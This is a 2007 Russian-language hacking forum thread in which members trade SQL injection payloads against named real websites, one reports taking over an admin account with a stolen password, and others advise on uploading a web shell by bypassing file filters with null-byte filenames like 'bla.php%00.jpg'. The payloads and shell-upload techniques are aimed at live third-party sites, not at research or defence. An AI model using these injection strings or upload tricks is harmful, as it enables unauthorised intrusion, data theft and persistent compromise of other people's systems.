HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #461  
Старый 15.12.2007, 03:15
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Расскажите ка мне в чём проблема =)
http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8 ,9,20
http://www.cs.virginia.edu/csnews/show.php?artID=-9+union+select+2,3,convert(3+using+latin1),5,6,7,8 ,9,20+from+information_schema.tables
 
Ответить с цитированием

  #462  
Старый 15.12.2007, 03:41
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

юзеру мускула не хватает прав для листинга метадаты в этом фолдере хран. information_schem'ы
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #463  
Старый 15.12.2007, 15:10
DEMIX
Познающий
Регистрация: 17.06.2007
Сообщений: 39
С нами: 9947280

Репутация: 11
По умолчанию

Ситуация: нашел sql инъекцию, узнал пасс админа, зашел под админом. Могу присвоить картинки некоторым предметам, изменять некоторые предметы. И все. Как можно залить шелл??? Пробовал присвоить картинку шелл.рнр , но там есть фильтр. Помогите залить шелл.
 
Ответить с цитированием

  #464  
Старый 15.12.2007, 15:22
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами: 9920546

Репутация: 1796
По умолчанию

а что за админка то? насколько я понял возможен аплоад файлов попробуй впиши веб шелл в файлы с именами bla.php%00.jpg или bla.php.rar...
__________________
Кто я?..
 
Ответить с цитированием

  #465  
Старый 15.12.2007, 15:44
DEMIX
Познающий
Регистрация: 17.06.2007
Сообщений: 39
С нами: 9947280

Репутация: 11
По умолчанию

Админка от онлайн игры.
Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка.
 
Ответить с цитированием

  #466  
Старый 15.12.2007, 15:47
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами: 10016425

Репутация: 1257


Question

помогите подобрать таблу с юзерами

http://wapclick.info/forum/readmess.php?UIN=Guest&pass=Guest&next_row=1&topic =-1+union+select+0,0,1,0,2,0/*&room=1&user=1

Последний раз редактировалось mr.The; 15.12.2007 в 15:53.. Причина: Вот!
 
Ответить с цитированием

  #467  
Старый 15.12.2007, 15:55
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Что-то я не понял. Если я поменяю shell.php в bla.php%00.jpg тогда я не смогу запустить шелл. Он будет открываться как картинка.

Пр удачной для тебя настройке сервера, т е magic_quotes_gpc=off и наличии кривого скрипта, файл загурзится с именем bla.php%00.jpg, после вызова функции copy() нулевой байт откинет разшерение .jpg и у тебя будет файл bla.php
 
Ответить с цитированием

  #468  
Старый 15.12.2007, 16:44
Klaus Doring
Участник форума
Регистрация: 23.07.2007
Сообщений: 100
С нами: 9895923

Репутация: 52
По умолчанию

Код:
 http://www.verra-motors.ru/main/index.html?id=5'INSERT%20INTO%20Users%20VALUES('admin',%20'123')
Я конечно извиняюсь, может я нареоман в синтаксисе Mysql, но почему ошибки вылазят?
 
Ответить с цитированием

  #469  
Старый 15.12.2007, 16:47
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами: 10488959

Репутация: 474
По умолчанию

нельзя в mysql inj вставлять записи

Разве что уязвимый запрос будет:
PHP код:
INSERT INTO [SQL-INJbla lba... /* 
 
Ответить с цитированием

  #470  
Старый 15.12.2007, 16:54
gibson
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами: 10636106

Репутация: 705
По умолчанию

Klaus Doring у тебя идет выборка из таблицы т.е. можно только выбирать данные из таб и притом еще с объед запросом union ENFIX тебе показал как можно вставить данные, посмотри может на сайте есть рега и может там есть скуль.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.